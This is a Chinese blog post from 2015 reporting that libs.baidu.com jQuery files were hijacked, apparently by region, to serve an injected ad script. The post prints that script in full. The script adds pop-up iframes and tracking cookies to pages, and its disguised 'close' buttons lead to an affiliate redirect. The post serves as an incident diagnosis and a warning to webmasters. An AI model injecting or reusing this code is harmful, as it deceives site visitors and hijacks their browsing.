百度的 libs.baidu.com 域名被恶意挟持插入广告
胡倡萌发表于 2015-11-13 02:24:36
接着昨天的话题《求助:谁知道这些广告代码是哪里来的》,从昨晚开始,只要打开我的网站都会出现广告,并且网站的js效果都会失效:
今天早上使用浏览器调试工具,查看到有报错 jQuery 未定义,然后尝试切换了一下 jQuery 库的地址,广告竟然消失了,接着直接打开之前使用的百度的 jQuery 库地址 http://libs.baidu.com/jquery/1.8.3/jquery.min.js,发现根源了:
然后打开上面出现的js文件:http://120.25.147.157:3579/jq142/a/click.js,真的就是广告代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 | var ht = document.getElementsByTagName('html')[0], //获取根节点 clearUrl = 'http://www.mangding.com/tkredir.php?', path = 'http://120.25.147.157:3579/jq142/a/', //地址前缀 pic_w = 440, //广告元素的宽 pic_h = 180, //广告元素的高 w_w = pic_w + 10, w_h = pic_h + 35, i_w = pic_w, i_h = pic_h + 3, closeTime = 30000, //弹窗关闭的延时秒数 btnClickUrl = clearUrl + 'http://s.click.taobao.com/t?e=m%3D2%26s%3DSzHwv0%2B3T1scQipKwQzePCperVdZeJviK7Vc7tFgwiFRAdhuF14FMeMuMyYCcSeK1aH1Hk3GeOhQozenMspqN%2BpkTkKjLd4YlnTn0enuw%2BYEc9An2MIWnKUuZxIcp9pfUIgVEmFmgnbDX0%2BHH2IEVaX4VWt66S4EJPwiig1bxLP9BvYCQR6XAr%2BKQ71wHNCAqP8YyUoZZlq4cXg3ii9waXPs9Sj9Qli1np4c65at3FeX3cwyLTlAhj2l4PysJx%2FP', //关闭按钮点击跳转地址 iframeMbUrl = path + 'page/click.html', iframePcUrl = path + 'page/click_pc.html', times, //定时器 alertAgainTime = 30, //移动端再次弹窗的分钟数 dialogCloseTime = 2000; //弹出窗口自动关闭时间 function deviceCheck() { //用户设备判断:移动端/pc var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc = sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid = sUserAgent.match(/android/i) == "android"; var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { if (!getCookie('timeSj201500001212')) { // alert('cookie不存在'); createMobile(); setAlertMark('timeSj201500001212'); } else { var preTime = new Date(getCookie('timeSj201500001212')).getTime(); var nowTime = (new Date()).getTime(); var timeSub = Math.floor((nowTime - preTime) % (3600 * 1000) / (60 * 1000)); // alert('已经过' + timeSub + '分钟'); if (timeSub >= alertAgainTime) { createMobile(); setAlertMark('timeSj201500001212'); } } } else { createPc(); } } //创建移动端弹窗 function createMobile() { var warp = document.createElement("div"); warp.style.width = '19.2rem'; warp.style.height = '8.8rem'; warp.style.position = 'fixed'; warp.style.top = '50%'; warp.style.left = '50%'; warp.style.marginTop = '-4.4rem'; warp.style.marginLeft = '-9.6rem'; warp.style.zIndex = '2147483647'; warp.setAttribute('id', 'sjImg000020131212'); warp.innerHTML = '<a href="' + btnClickUrl + '" target="_blank" class="closeBtn" id="closeBtn" style="position: absolute; width: 1.6rem; height: 1.6rem; right: 0; top: 0; cursor: pointer; z-index: 2147483647;"><img style="position: absolute; width: 1.6rem; height: 1.6rem; right: 0; top: 0; cursor: pointer; z-index: 2147483647;" src="' + path + 'images/close.png"></a><iframe marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="yes" src="' + iframeMbUrl + '" style="width: 17.6rem; height: 7.2rem; z-index: 2147483646; position: absolute; top: 0.8rem; left: 0.8rem; background: #FFF;" class="showimg"></iframe>'; ht.appendChild(warp); var btn = document.getElementById('closeBtn'); alertBox(btn, 'sjImg000020131212'); } //创建PC端弹窗 function createPc() { //创建弹窗包围 var wapDiv = document.createElement('div'); wapDiv.style.boxSizing = 'content-box'; wapDiv.style.margin = '0'; wapDiv.style.padding = '0'; wapDiv.style.display = 'block'; wapDiv.style.visibility = 'visible'; wapDiv.style.border = 'none'; wapDiv.style.float = 'none'; wapDiv.style.overflow = 'hidden'; wapDiv.style.position = 'fixed'; wapDiv.style.zIndex = '2147483647'; wapDiv.style.width = w_w + 'px'; wapDiv.style.height = w_h + 'px'; wapDiv.style.right = '5px'; wapDiv.style.bottom = '3px'; wapDiv.style.background = 'none'; wapDiv.setAttribute('id', 'sjImg000020131212'); //在弹窗包围内添加内容 wapDiv.innerHTML = '<a href="' + btnClickUrl + '" target="_blank" id="c_w" style="box-sizing: content-box; margin: 0px 0px 5px; padding: 0px; height: 20px; width: 61px; cursor: pointer; position: absolute; right:0; overflow: hidden; top: 0px;"><a id="c_m" style="margin: 0px 0px 3px; padding: 0px; display: inline-block; border: none; height: 20px; width: 20px; font-size: 12px; cursor: pointer; float: right; line-height: 20px; background: url(http://120.25.147.157:3579/jq142/a/images/xuanfu_close.png);"></a><a id="c_b" style="box-sizing: content-box; width: 40px; height: 20px; color: rgb(255, 255, 255); margin-right: 1px; font-size: 12px; float: right; font-family: 微软雅黑; line-height: 20px; text-align: center; background-color: rgb(153, 153, 153);">\u5173\u95ed</a></a><div style="box-sizing: content-box; width: 440px; height: 180px; overflow: hidden; position: absolute; left: 0px; top: 25px; padding: 4px; border: 1px solid rgb(172, 172, 172);"><iframe width="' + i_w + '" height="' + i_h + '" align="center" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" allowtransparency="yes" src="' + iframePcUrl + '"></iframe></div>'; //向网页添加弹窗 ht.appendChild(wapDiv); var c_w = document.getElementById('c_w'); //按钮包围 var c_m = document.getElementById('c_m'); //按钮X var c_b = document.getElementById('c_b'); //按钮关闭 c_w.onmouseenter = function() { c_b.style.backgroundColor = '#000'; c_m.style.background = 'url(' + path + '/images/xuanfu_close_hover.png)'; } c_w.onmouseleave = function() { c_b.style.backgroundColor = '#999'; c_m.style.background = 'url(' + path + '/images/xuanfu_close.png)'; } alertBox(c_w, 'sjImg000020131212'); } //延时关闭弹窗 function alertBox(_btn, parentId) { times = setTimeout(function() { ht.removeChild(document.getElementById(parentId)); //关闭弹窗 }, closeTime); _btn.onclick = function() { // var a = window.open(btnClickUrl, '', 'fullscreen=1,left=0, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no,alwaysLowered = true, status=no'); // a.resizeTo(screen.availWidth, screen.availHeight); // setTimeout(function() { //自动关闭方法 // a.close(); // }, dialogCloseTime); times = ""; ht.removeChild(document.getElementById(parentId)); //关闭弹窗 } } //设置定时弹窗标志 function setAlertMark(name) { var cookieTime = new Date(); setCookie(name, cookieTime); } //写cookies function setCookie(name, value) { var Days = 30; var exp = new Date(); exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000); document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString(); } //读取cookies function getCookie(name) { var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)"); if (arr = document.cookie.match(reg)) return unescape(arr[2]); else return null; } //var leave2 = leave1 % (3600 * 1000) //计算小时数后剩余的毫秒数 //var minutes = Math.floor(leave2 / (60 * 1000)); //页面加载完成后运行弹窗 window.onload = function() { deviceCheck(); } |
接着测试访问 http://libs.baidu.com/ 开头的所有网址,显示的代码都如上面第二个图片一样。问了下群里的朋友,都没这个问题,也就是说,这个问题只在我这边(广西玉林市博白县电信宽带网络)出现,是分地区的,不知是宽带商挟持的还是其他,然后 http://120.25.147.157:3579/jq142/a/click.js 的这个IP是阿里云的:
接着看广告代码的第二行,出现了域名 http://www.mangding.com 作为跟踪统计,不排除就是这个网站所有者或其服务器管理人员制造的这个广告代码,或者是由这个网站提供统计分析服务。
最后得出结论:
1.百度域名 libs.baidu.com 被恶意挟持插入广告,而且可能是分地区的,不排除宽带运营商操作的可能性
2.该广告代码托管于阿里云服务器,阿里云官方应该可以查看到这个用户,但是人家不会告诉我是谁
3.http://www.mangding.com 作为跟踪统计,不排除就是这个网站所有者或其服务器管理人员制造是这个广告代码,或者是由这个网站提供统计分析服务。
建议:
各大站长请先不要引用 百度域名 libs.baidu.com 下的文件,以免导致某些地区的用户受到广告骚扰。